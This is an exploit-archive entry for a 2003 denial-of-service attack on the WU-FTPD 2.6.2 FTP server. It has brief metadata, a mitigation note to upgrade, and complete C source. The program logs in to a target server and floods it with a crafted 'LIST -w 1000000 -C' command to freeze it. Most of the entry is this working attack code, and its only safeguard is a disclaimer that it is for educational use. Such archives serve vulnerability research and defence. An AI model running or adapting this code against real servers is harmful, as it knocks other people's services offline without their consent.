WU-FTPD 2.6.2 Freezer

vendor:

WU-FTPD

by:

Angelo Rosiello

7,5

CVSS

HIGH

DoS

400

CWE

Product Name: WU-FTPD

Affected Version From: 2.6.2

Affected Version To: 2.6.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:wu-ftpd:wu-ftpd:2.6.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Red Hat 9.0

2003

This exploit is a Denial of Service (DoS) vulnerability in WU-FTPD 2.6.2. It allows an attacker to send a specially crafted LIST command to the server, which causes the server to freeze. This exploit was discovered by Angelo Rosiello in 2003.

Mitigation:

Upgrade to a version of WU-FTPD that is not vulnerable to this exploit.

Source

Exploit-DB raw data:

/*
*		 (c) Rosiello Security
*
* Copyright Rosiello Security 2003
*	 All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail	: angelo rosiello org
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>

void addr_initialize( );
void usage( );

int main( int argc, char **argv )
{
	int i, sd, PORT, loop, error;
	char user[30], password[30], ch;
	struct sockaddr_in server_addr;

	fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
	fprintf( stdout, "http://www.rosiello.org\n" );
	fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

	if( argc != 6 ) usage( argv[0] );

	if( strlen( argv[3] ) > 20 ) exit( 0 );
	if( strlen( argv[4] ) > 20 ) exit( 0 );

	sprintf( user, "USER %s\n", argv[3] );
	sprintf( password, "PASS %s\n", argv[4] );

	PORT = atoi( argv[2] );
	loop = atoi( argv[5] );

	addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
	sd = socket( AF_INET, SOCK_STREAM, 0 );

	error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
	if( error != 0 )
	{
		perror( "Something wrong with the connection" );
		exit( 0 );
	}

	while ( ch != '\n' )
	{
		recv( sd, &ch, 1, 0);
		printf("%c", ch );
	}

	ch = '\0';

	printf( "Connection executed, now waiting to log in...\n" );

	printf( "%s", user );

	send( sd, user, strlen( user ), 0 );
	while ( ch != '\n' )
	{
		recv( sd, &ch, 1, 0);
		printf("%c", ch );
	}
	printf( "%s", password );

	ch = '\0';

	send( sd, password, strlen( password ), 0 );
	while ( ch != '\n' )
	{
		recv( sd, &ch, 1, 0);
		printf("%c", ch );
	}

	printf( "Sending the DoS query\n" );
	for( i=0; i<loop; i++ )
	{
		write( sd, "LIST -w 1000000 -C\n", 19 );
	}
	printf( "All done\n" );
	close( sd );
	return 0;
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
	address -> sin_family = AF_INET;
	address -> sin_port = htons((u_short)port);
	address -> sin_addr.s_addr = IPaddr;
}

void usage( char *program )
{
	fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
	exit(0);
}


// milw0rm.com [2003-10-31]